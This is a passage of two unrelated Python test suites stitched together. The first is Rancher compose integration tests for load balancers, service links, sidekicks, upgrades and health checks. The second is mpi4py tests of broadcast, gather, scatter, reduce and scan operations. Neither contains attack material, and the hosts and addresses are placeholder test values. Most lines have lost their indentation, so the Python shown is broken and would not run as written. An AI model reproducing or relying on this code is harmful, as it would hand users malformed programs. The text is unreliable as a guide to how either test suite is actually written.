assert map.ports == []
assert lb.launchConfig.ports == ['80:8080']
assert lb.type == 'loadBalancerService'
def test_lb_path_name_minimal(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 84:84
links:
- web
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
web = _get_service(project.services(), 'web')
map = find_one(client.list_service_consume_map, serviceId=lb.id)
assert map.ports == []
assert map.consumedServiceId == web.id
assert lb.type == 'loadBalancerService'
assert lb.launchConfig.ports == ['84:84']
def test_lb_full_config(client, compose):
project_name = create_project(compose, file='assets/lb/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
_get_service(project.services(), 'web')
assert lb.type == 'loadBalancerService'
assert lb.loadBalancerConfig.haproxyConfig['global'] == 'foo bar\n'
assert lb.loadBalancerConfig.haproxyConfig.defaults == 'def 1\n'
def test_links(client, compose):
template = '''
web:
image: nginx
db:
image: mysql
links:
- web
other:
image: foo
links:
- web
- db
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web = _get_service(project.services(), 'web')
db = _get_service(project.services(), 'db')
other = _get_service(project.services(), 'other')
assert len(web.consumedservices()) == 0
db_consumed = db.consumedservices()
assert len(db_consumed) == 1
assert db_consumed[0].name == 'web'
other_consumed = other.consumedservices()
assert len(other_consumed) == 2
names = {i.name for i in other_consumed}
assert names == {'web', 'db'}
def test_volumes_from(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: db
image: nginx
db:
image: mysql
volumes_from:
- web
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.secondaryLaunchConfigs[0].dataVolumesFromLaunchConfigs == \
['web']
def test_sidekick_simple(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: log
image: nginx
log:
image: mysql
log2:
image: bar
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
services = project.services()
service = _get_service(services, 'web')
log2 = _get_service(services, 'log2')
assert len(services) == 2
assert service.name == 'web'
assert service.launchConfig.imageUuid == 'docker:nginx'
assert service.launchConfig.networkMode == 'managed'
assert len(service.secondaryLaunchConfigs) == 1
assert service.secondaryLaunchConfigs[0].name == 'log'
assert service.secondaryLaunchConfigs[0].imageUuid == 'docker:mysql'
assert service.secondaryLaunchConfigs[0].networkMode == 'managed'
assert log2.name == 'log2'
assert log2.launchConfig.imageUuid == 'docker:bar'
def test_sidekick_container_network(client, compose):
template = '''
web:
labels:
io.rancher.sidekicks: log
image: nginx
log:
net: container:web
image: mysql
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.launchConfig.imageUuid == 'docker:nginx'
assert len(service.secondaryLaunchConfigs) == 1
assert service.secondaryLaunchConfigs[0].name == 'log'
assert service.secondaryLaunchConfigs[0].imageUuid == 'docker:mysql'
assert service.secondaryLaunchConfigs[0].networkMode == 'container'
assert service.secondaryLaunchConfigs[0].networkLaunchConfig == 'web'
def test_not_external_service_hostname(client, compose):
template = '''
web:
hostname: foo
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'service'
assert service.launchConfig.hostname == 'foo'
def test_external_service_hostname(client, compose):
project_name = create_project(compose, file='assets/hostname/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'externalService'
assert service.hostname == 'example.com'
def test_external_ip(client, compose):
project_name = create_project(compose, file='assets/externalip/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.type == 'externalService'
assert service.externalIpAddresses == ['1.1.1.1', '2.2.2.2']
assert service.healthCheck.healthyThreshold == 2
def test_service_inplace_rollback(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'active'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-r',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
assert s2.launchConfig.imageUuid == 'docker:nginx'
def test_service_inplace_upgrade_inactive(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'inactive'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-c',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
def test_service_inplace_upgrade(client, compose):
project_name = random_str()
template = '''
web:
image: nginx
'''
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
assert s.state == 'active'
template = '''
web:
image: nginx:1.9.5
'''
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-u',
'-d')
s2 = find_one(project.services)
assert s.launchConfig.labels['io.rancher.service.hash'] != \
s2.launchConfig.labels['io.rancher.service.hash']
assert s2.launchConfig.imageUuid == 'docker:nginx:1.9.5'
assert s2.state == 'upgraded'
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-c',
'-d')
s2 = find_one(project.services)
assert s2.state == 'active'
def test_service_hash_with_rancher(client, compose):
project_name = create_project(compose,
file='assets/hash-no-rancher/test.yml')
project = find_one(client.list_environment, name=project_name)
s = find_one(project.services)
project_name = create_project(compose,
file='assets/hash-with-rancher/test.yml')
project = find_one(client.list_environment, name=project_name)
s2 = find_one(project.services)
assert s.metadata['io.rancher.service.hash'] is not None
assert s2.metadata['io.rancher.service.hash'] is not None
assert s.metadata['io.rancher.service.hash'] != \
s2.metadata['io.rancher.service.hash']
def test_service_hash_no_change(client, compose):
template = '''
web1:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web = find_one(project.services)
assert web.metadata['io.rancher.service.hash'] is not None
assert web.launchConfig.labels['io.rancher.service.hash'] is not None
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
web2 = find_one(project.services)
assert web.metadata['io.rancher.service.hash'] == \
web2.metadata['io.rancher.service.hash']
assert web.launchConfig.labels['io.rancher.service.hash'] == \
web2.launchConfig.labels['io.rancher.service.hash']
def test_dns_service(client, compose):
template = '''
web1:
image: nginx
web2:
image: nginx
web:
image: rancher/dns-service
links:
- web1
- web2
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
services = project.services()
assert len(services) == 3
web = _get_service(services, 'web')
assert web.type == 'dnsService'
consumed = web.consumedservices()
assert len(consumed) == 2
names = {x.name for x in consumed}
assert names == {'web1', 'web2'}
def test_up_relink(client, compose):
template = '''
lb:
image: rancher/load-balancer-service
ports:
- 80
links:
- web
labels:
a: b
c: d
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
lb = _get_service(project.services(), 'lb')
consumed = lb.consumedservices()
assert len(consumed) == 1
assert consumed[0].name == 'web'
del lb.launchConfig.labels['io.rancher.service.hash']
assert lb.launchConfig.labels == {
'a': 'b',
'c': 'd',
}
template2 = '''
lb:
image: nginx
ports:
- 80
links:
- web2
web2:
image: nginx
'''
compose.check_call(template2, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
def check():
x = lb.consumedservices()
if len(x) == 1:
return x
consumed = wait_for(check, timeout=5)
assert len(consumed) == 1
assert consumed[0].name == 'web2'
def test_service_upgrade_from_nil(client, compose):
template = '''
foo:
image: nginx
web2:
image: nginx
'''
project_name = create_project(compose, input=template)
upgrade = '''
foo:
image: nginx
web:
image: nginx
web2:
image: nginx
'''
compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2')
def test_service_upgrade_no_global_on_src(client, compose):
template = '''
web:
image: nginx
labels:
io.rancher.scheduler.global: "true"
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
upgrade = '''
web2:
image: nginx
'''
out, err = compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
    assert out.find('Upgrade is not supported for global services') != -1
assert len(project.services()) == 1
def test_service_upgrade_no_global_on_dest(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
upgrade = '''
web2:
image: nginx
labels:
io.rancher.scheduler.global: true
'''
out, err = compose.check_retcode(upgrade, 1, '-p', project_name, '-f',
'-', 'upgrade', 'web', 'web2',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
    assert out.find('Upgrade is not supported for global services') != -1
def test_service_map_syntax(client, compose):
template = '''
foo:
image: nginx
links:
- web:alias
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
maps = client.list_serviceConsumeMap(serviceId=foo.id)
assert len(maps) == 1
assert maps[0].name == 'alias'
def test_cross_stack_link(client, compose):
template = '''
dest:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
dest = _get_service(project.services(), 'dest')
template = '''
src:
external_links:
- {}/dest
image: nginx
'''.format(project_name)
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
src = _get_service(project.services(), 'src')
services = src.consumedservices()
assert len(services) == 1
assert services[0].id == dest.id
def test_up_deletes_links(client, compose):
template = '''
dest:
image: busybox
command: cat
stdin_open: true
tty: true
src:
image: busybox
command: cat
stdin_open: true
tty: true
links:
- dest
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
src = _get_service(project.services(), 'src')
services = src.consumedservices()
assert len(services) == 1
template = '''
src:
image: nginx
'''
compose.check_call(template, '-f', '-', '-p', project_name, 'up', '-d')
services = src.consumedservices()
assert len(services) == 0
def test_upgrade_no_source(client, compose):
project_name = random_str()
compose.check_retcode(None, 1, '-p', project_name, '-f',
'assets/upgrade-ignore-scale/docker-compose.yml',
'upgrade', '--interval', '1000',
'--scale=2', 'from', 'to')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
def test_upgrade_ignore_scale(client, compose):
project_name = create_project(compose, file='assets/upgrade-ignore-scale/'
'docker-compose-source.yml')
compose.check_call(None, '--verbose', '-f', 'assets/upgrade-ignore-scale/'
'docker-compose-source.yml',
'-p', project_name, 'up', '-d')
project = find_one(client.list_environment, name=project_name)
compose.check_call(None, '-p', project_name, '-f',
'assets/upgrade-ignore-scale/docker-compose.yml',
'upgrade', '--pull', '--interval', '1000',
'--scale=2', 'from', 'to')
f = _get_service(project.services(), 'from')
to = _get_service(project.services(), 'to')
assert to.scale <= 2
f = client.wait_success(f)
to = client.wait_success(to)
assert f.scale == 0
assert to.scale == 2
assert to.state == 'active'
def test_service_link_with_space(client, compose):
template = '''
foo:
image: nginx
links:
- "web: alias"
web:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
maps = client.list_serviceConsumeMap(serviceId=foo.id)
assert len(maps) == 1
assert maps[0].name == 'alias'
def test_circle_simple(client, compose):
template = '''
foo:
image: nginx
links:
- web
web:
image: nginx
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
web = _get_service(project.services(), 'web')
s = find_one(foo.consumedservices)
assert s.name == 'web'
s = find_one(web.consumedservices)
assert s.name == 'foo'
def test_one_circle(client, compose):
template = '''
foo:
image: nginx
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
s = find_one(foo.consumedservices)
assert s.name == 'foo'
def test_circle_madness(client, compose):
template = '''
foo:
image: nginx
links:
- foo
- foo2
- foo3
foo2:
image: nginx
links:
- foo
- foo2
- foo3
foo3:
image: nginx
links:
- foo
- foo2
- foo3
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'up', '-d')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
foo2 = _get_service(project.services(), 'foo2')
foo3 = _get_service(project.services(), 'foo3')
assert len(foo.consumedservices()) == 3
assert len(foo2.consumedservices()) == 3
assert len(foo3.consumedservices()) == 3
def test_variables(client, compose):
project_name = random_str()
compose.check_call(None, '--env-file', 'assets/env-file/env-file',
'--verbose', '-f', 'assets/env-file/docker-compose.yml',
'-p', project_name, 'create')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.launchConfig.imageUuid == 'docker:B'
assert service.launchConfig.labels['var'] == 'B'
assert service.metadata.var == 'E'
assert service.metadata.var2 == ''
def test_metadata_on_service(client, compose):
project_name = create_project(compose, file='assets/metadata/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.metadata.test1[0] == 'one'
assert service.metadata.test1[1] == 'two'
assert service.metadata.test2.name == "t2name"
assert service.metadata.test2.value == "t2value"
assert service.metadata.test3
assert service.metadata.test4[0].test5.name == "t5name"
assert service.metadata.test4[1].test6.name == "t6name"
assert service.metadata.test4[1].test6.value == "t6value"
assert service.metadata.test7.test7nest.test7nestofnest[0].test7dot1.name \
== "test7dot1name"
assert service.metadata.test7.test7nest.test7nestofnest[1].test7dot2.name \
== "test7dot2name"
assert service.metadata.test8[0].test8a[0].name == "test8a"
assert service.metadata.test8[0].test8a[0].value == "test8avalue"
assert service.metadata.test8[0].test8a[1].name == "test8ab"
assert service.metadata.test8[0].test8a[1].value == "test8abvalue"
assert service.metadata.test8[1].test8b[0].name == "test8ba"
assert service.metadata.test8[1].test8b[0].value == "test8bavalue"
def test_healthchecks(client, compose):
project_name = create_project(compose, file='assets/health/test.yml')
project = find_one(client.list_environment, name=project_name)
service = find_one(project.services)
assert service.name == 'web'
assert service.launchConfig.healthCheck.port == 80
assert service.launchConfig.healthCheck.interval == 2000
assert service.launchConfig.healthCheck.unhealthyThreshold == 3
assert service.launchConfig.healthCheck.requestLine == \
"OPTIONS /ping HTTP/1.1\r\nHost:\\ www.example.com"
def _get_service(services, name):
service = None
for i in services:
if i.name == name:
service = i
break
assert service is not None
return service
def test_restart_no(client, compose):
template = '''
web:
image: nginx
restart: "no"
'''
project_name = create_project(compose, input=template)
find_one(client.list_environment, name=project_name)
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
p = find_one(client.list_environment, name=project_name)
find_one(p.services)
def test_stack_case(client, compose):
template = '''
web:
image: nginx
'''
project_name = create_project(compose, input=template)
find_one(client.list_environment, name=project_name)
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
compose.check_call(template, '--verbose', '-f', '-', '-p',
project_name.upper(), 'up', '-d')
find_one(client.list_environment, name=project_name)
@pytest.mark.skipif('True')
def test_certs(new_context, compose_bin, request):
client = new_context.client
compose = new_compose(client, compose_bin, request)
cert = client.create_certificate(name='cert1',
cert=CERT,
certChain=CERT,
key=KEY)
cert2 = client.create_certificate(name='cert2',
cert=CERT,
certChain=CERT,
key=KEY)
cert = client.wait_success(cert)
cert2 = client.wait_success(cert2)
assert cert.state == 'active'
assert cert2.state == 'active'
project_name = create_project(compose,
file='assets/ssl/docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
lb = _get_service(project.services(), 'lb')
assert lb.defaultCertificateId == cert.id
assert lb.certificateIds == [cert.id, cert2.id]
def test_cert_not_found(new_context, compose_bin, request):
compose = new_compose(new_context.client, compose_bin, request)
compose.check_retcode(None, 1, '-p', random_str(), '-f',
'assets/ssl/docker-compose.yml', 'create')
def test_project_name(client, compose):
project_name = 'FooBar23-' + random_str()
stack = client.create_environment(name=project_name)
stack = client.wait_success(stack)
assert stack.state == 'active'
template = '''
web:
image: nginx
'''
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
assert len(project.services()) == 1
def test_project_name_case_insensitive(client, compose):
project_name = 'FooBar23-' + random_str()
stack = client.create_environment(name=project_name)
stack = client.wait_success(stack)
assert stack.state == 'active'
template = '''
web:
image: nginx
'''
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
project_name = project_name.replace('FooBar', 'fOoBaR')
assert project_name.startswith('fOoBaR')
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'create')
assert len(project.services()) == 1
def test_project_name_with_dots(client, compose):
project_name = 'something-with-dashes-v0-2-6'
bad_project_name = 'something-with-dashes-v0.2.6'
ret = client.list_environment(name=project_name)
assert len(ret) == 0
compose.check_call(None, '--verbose', '-f',
'assets/{}/docker-compose.yml'.format(bad_project_name),
'create')
ret = client.list_environment(name=project_name)
assert len(ret) == 1
def test_create_then_up_on_circle(client, compose):
template = '''
etcd-lb:
image: rancher/load-balancer-service
links:
- etcd0
- etcd1
- etcd2
etcd0:
stdin_open: true
image: busybox
command: cat
links:
- etcd1
- etcd2
etcd1:
stdin_open: true
image: busybox
command: cat
links:
- etcd0
- etcd2
etcd2:
stdin_open: true
image: busybox
command: cat
links:
- etcd0
- etcd1
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
etcd_lb = _get_service(project.services(), 'etcd-lb')
etcd0 = _get_service(project.services(), 'etcd0')
etcd1 = _get_service(project.services(), 'etcd1')
etcd2 = _get_service(project.services(), 'etcd2')
assert len(etcd_lb.consumedservices()) == 3
assert len(etcd0.consumedservices()) == 2
assert len(etcd1.consumedservices()) == 2
assert len(etcd2.consumedservices()) == 2
assert len(etcd_lb.consumedservices()) == 3
compose.check_call(template, '-f', '-', '-p', project_name, 'up', '-d')
assert len(etcd_lb.consumedservices()) == 3
assert len(etcd0.consumedservices()) == 2
assert len(etcd1.consumedservices()) == 2
assert len(etcd2.consumedservices()) == 2
def test_expose_port_ignore(client, compose):
template = '''
foo:
image: nginx
expose:
- 1234
links:
- foo
'''
project_name = random_str()
compose.check_call(template, '-p', project_name, '-f',
'-', 'create')
project = find_one(client.list_environment, name=project_name)
foo = _get_service(project.services(), 'foo')
assert 'ports' not in foo.launchConfig
def test_create_no_update_links(client, compose):
template = '''
foo:
image: nginx
links:
- foo2
foo2:
image: tianon/true
foo3:
image: tianon/true
'''
project_name = random_str()
compose.check_call(template, '--verbose', '-f', '-', '-p', project_name,
'up', '-d')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 3
foo = _get_service(project.services(), 'foo')
foo2 = find_one(foo.consumedservices)
assert foo2.name == 'foo2'
template2 = '''
foo:
image: tianon/true
links:
- foo3
foo2:
image: tianon/true
foo3:
image: tianon/true
'''
compose.check_call(template2, '-p', project_name, '-f', '-', 'create')
foo2 = find_one(foo.consumedservices)
assert foo2.name == 'foo2'
def test_pull_sidekick(client, compose):
template = '''
foo:
labels:
io.rancher.sidekicks: foo2
image: nginx
foo2:
image: tianon/true
'''
project_name = random_str()
out, err = compose.check_retcode(template, 0, '-p', project_name, '-f',
'-', 'pull', stdout=subprocess.PIPE)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 0
assert 'nginx' in out
assert 'tianon/true' in out
def test_retain_ip(client, compose):
project_name = create_project(compose, file='assets/retain-ip/'
'docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
retain = _get_service(project.services(), 'retain')
not_retain = _get_service(project.services(), 'not-retain')
assert retain.retainIp
assert not not_retain.retainIp
def test_no_update_selector_link(client, compose):
template = '''
parent:
labels:
io.rancher.service.selector.link: foo=bar
image: tianon/true
child:
labels:
foo: bar
image: tianon/true
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 2
parent = _get_service(project.services(), 'parent')
find_one(parent.consumedservices)
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-d',
'parent')
parent = _get_service(project.services(), 'parent')
find_one(parent.consumedservices)
def test_sidekick_build_remote(client, compose):
template = '''
parent:
labels:
io.rancher.sidekicks: child
build: http://parent
dockerfile: parent-file
child:
build: http://child
dockerfile: child-file
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
parent = _get_service(project.services(), 'parent')
assert parent.launchConfig.build.remote == 'http://parent'
assert parent.launchConfig.build.dockerfile == 'parent-file'
assert len(parent.secondaryLaunchConfigs) == 1
assert parent.secondaryLaunchConfigs[0].build.remote == 'http://child'
assert parent.secondaryLaunchConfigs[0].build.dockerfile == 'child-file'
def test_sidekick_healthcheck(client, compose):
project_name = create_project(compose, file='assets/sidekick-health/'
'docker-compose.yml')
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
parent = _get_service(project.services(), 'parent')
assert parent.launchConfig.healthCheck.port == 80
assert parent.secondaryLaunchConfigs[0].healthCheck.port == 81
def test_force_upgrade_primary(client, compose):
template = '''
parent:
labels:
io.rancher.sidekicks: child
image: nginx
child:
image: nginx
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
assert len(project.services()) == 1
compose.check_call(template, '-p', project_name, '-f', '-', 'up', '-d')
parent = _get_service(project.services(), 'parent')
instances = parent.instances()
child_prefix = project_name + '_child'
child_id = [x.id for x in instances if x.name.startswith(child_prefix)]
assert len(instances) == 2
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'--force-upgrade', '-d', 'parent')
new_instances = parent.instances()
    new_child_id = [x.id for x in new_instances
                    if x.name.startswith(child_prefix)]
assert child_id == new_child_id
ids = {x.id for x in instances}.union({x.id for x in new_instances})
assert len(ids) == 3
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'-c', '-d')
compose.check_call(template, '-p', project_name, '-f', '-', 'up',
'--force-upgrade', '-d')
ids = ids.union({x.id for x in parent.instances()})
assert len(ids) == 5
def test_virtual_machine(client, compose):
template = '''
vm:
type: virtualMachine
image: nginx
vcpu: 2
memory: 1024
userdata: |
#cloud-config
foo
disks:
- name: foo
size: 1g
opts:
foo: bar
- name: foo2
size: 2g
'''
project_name = create_project(compose, input=template)
project = find_one(client.list_environment, name=project_name)
vm = find_one(project.services)
assert vm.launchConfig.kind == 'virtualMachine'
assert vm.launchConfig.vcpu == 2
assert vm.launchConfig.userdata == '#cloud-config\nfoo\n'
assert vm.launchConfig.memoryMb == 1024
assert vm.launchConfig.disks[0] == {'name': 'foo', 'size': '1g',
'opts': {'foo': 'bar'}}
assert vm.launchConfig.disks[1] == {'name': 'foo2', 'size': '2g'}
def test_cyclic_link_dependency(client, compose):
# cyclic link dependencies shouldn't error or hang
create_project(compose, file='assets/cyclic-link-dependency/'
'docker-compose.yml')
def test_yaml_corner_cases(client, compose):
create_project(compose, input='''
service:
image: nginx
environment:
A: :A
B: ":B"
C: "contains: colon"
D: 'contains: colon'
''')
|
|
from mpi4py import MPI
import mpiunittest as unittest
from functools import reduce
cumsum = lambda seq: reduce(lambda x, y: x+y, seq, 0)
cumprod = lambda seq: reduce(lambda x, y: x*y, seq, 1)
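# Quick sanity check of the helpers above (plain arithmetic, no MPI involved),
# added purely as an illustration of what they compute.
assert cumsum(range(4)) == 6       # 0 + 1 + 2 + 3
assert cumprod([2, 3, 4]) == 24    # 2 * 3 * 4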
_basic = [None,
True, False,
-7, 0, 7, 2**31,
-2**63+1, 2**63-1,
-2.17, 0.0, 3.14,
1+2j, 2-3j,
'mpi4py',
]
messages = _basic
messages += [ list(_basic),
tuple(_basic),
dict([('k%d' % key, val)
for key, val in enumerate(_basic)])
]
class BaseTestCCOObj(object):
COMM = MPI.COMM_NULL
def testBarrier(self):
self.COMM.barrier()
def testBcast(self):
for smess in messages:
for root in range(self.COMM.Get_size()):
rmess = self.COMM.bcast(smess, root=root)
self.assertEqual(smess, rmess)
def testGather(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
for root in range(size):
rmess = self.COMM.gather(smess, root=root)
if rank == root:
self.assertEqual(rmess, [smess] * size)
else:
self.assertEqual(rmess, None)
def testScatter(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
for root in range(size):
if rank == root:
rmess = self.COMM.scatter([smess] * size, root=root)
else:
rmess = self.COMM.scatter(None, root=root)
self.assertEqual(rmess, smess)
def testAllgather(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
rmess = self.COMM.allgather(smess)
self.assertEqual(rmess, [smess] * size)
def testAlltoall(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for smess in messages + [messages]:
rmess = self.COMM.alltoall([smess] * size)
self.assertEqual(rmess, [smess] * size)
def testReduce(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for root in range(size):
for op in (MPI.SUM, MPI.PROD,
MPI.MAX, MPI.MIN,
MPI.MAXLOC, MPI.MINLOC,
MPI.REPLACE, MPI.NO_OP):
if op == MPI.OP_NULL: continue
if op in (MPI.MAXLOC, MPI.MINLOC):
sendobj = (rank, rank)
else:
sendobj = rank
value = self.COMM.reduce(sendobj, op=op, root=root)
if rank != root:
self.assertTrue(value is None)
else:
if op == MPI.SUM:
self.assertEqual(value, cumsum(range(size)))
elif op == MPI.PROD:
self.assertEqual(value, cumprod(range(size)))
elif op == MPI.MAX:
self.assertEqual(value, size-1)
elif op == MPI.MIN:
self.assertEqual(value, 0)
elif op == MPI.MAXLOC:
self.assertEqual(value[0], size-1)
self.assertEqual(value[1], size-1)
elif op == MPI.MINLOC:
self.assertEqual(value[0], 0)
self.assertEqual(value[1], 0)
elif op == MPI.REPLACE:
self.assertEqual(value, size-1)
elif op == MPI.NO_OP:
self.assertEqual(value, 0)
def testAllreduce(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
for op in (MPI.SUM, MPI.PROD,
MPI.MAX, MPI.MIN,
MPI.MAXLOC, MPI.MINLOC,
MPI.REPLACE, MPI.NO_OP):
if op == MPI.OP_NULL: continue
if op in (MPI.MAXLOC, MPI.MINLOC):
sendobj = (rank, rank)
else:
sendobj = rank
value = self.COMM.allreduce(sendobj, op)
if op == MPI.SUM:
self.assertEqual(value, cumsum(range(size)))
elif op == MPI.PROD:
self.assertEqual(value, cumprod(range(size)))
elif op == MPI.MAX:
self.assertEqual(value, size-1)
elif op == MPI.MIN:
self.assertEqual(value, 0)
elif op == MPI.MAXLOC:
self.assertEqual(value[1], size-1)
elif op == MPI.MINLOC:
self.assertEqual(value[1], 0)
elif op == MPI.REPLACE:
self.assertEqual(value, size-1)
elif op == MPI.NO_OP:
self.assertEqual(value, 0)
def testScan(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
# --
sscan = self.COMM.scan(size, op=MPI.SUM)
self.assertEqual(sscan, cumsum([size]*(rank+1)))
# --
rscan = self.COMM.scan(rank, op=MPI.SUM)
self.assertEqual(rscan, cumsum(range(rank+1)))
# --
minloc = self.COMM.scan((rank, rank), op=MPI.MINLOC)
maxloc = self.COMM.scan((rank, rank), op=MPI.MAXLOC)
self.assertEqual(minloc, (0, 0))
self.assertEqual(maxloc, (rank, rank))
# --
if MPI.REPLACE != MPI.OP_NULL:
rscan = self.COMM.scan(rank, op=MPI.REPLACE)
self.assertEqual(rscan, rank)
# --
if MPI.NO_OP != MPI.OP_NULL:
rscan = self.COMM.scan(rank, op=MPI.NO_OP)
self.assertEqual(rscan, 0)
def testExscan(self):
size = self.COMM.Get_size()
rank = self.COMM.Get_rank()
# --
sscan = self.COMM.exscan(size, op=MPI.SUM)
if rank == 0:
self.assertTrue(sscan is None)
else:
self.assertEqual(sscan, cumsum([size]*(rank)))
# --
rscan = self.COMM.exscan(rank, op=MPI.SUM)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, cumsum(range(rank)))
# --
minloc = self.COMM.exscan((rank, rank), op=MPI.MINLOC)
maxloc = self.COMM.exscan((rank, rank), op=MPI.MAXLOC)
if rank == 0:
self.assertEqual(minloc, None)
self.assertEqual(maxloc, None)
else:
self.assertEqual(minloc, (0, 0))
self.assertEqual(maxloc, (rank-1, rank-1))
# --
if MPI.REPLACE != MPI.OP_NULL:
rscan = self.COMM.exscan(rank, op=MPI.REPLACE)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, rank-1)
# --
if MPI.NO_OP != MPI.OP_NULL:
rscan = self.COMM.exscan(rank, op=MPI.NO_OP)
if rank == 0:
self.assertTrue(rscan is None)
else:
self.assertEqual(rscan, 0)
class TestCCOObjSelf(BaseTestCCOObj, unittest.TestCase):
COMM = MPI.COMM_SELF
class TestCCOObjWorld(BaseTestCCOObj, unittest.TestCase):
COMM = MPI.COMM_WORLD
class TestCCOObjSelfDup(TestCCOObjSelf):
def setUp(self):
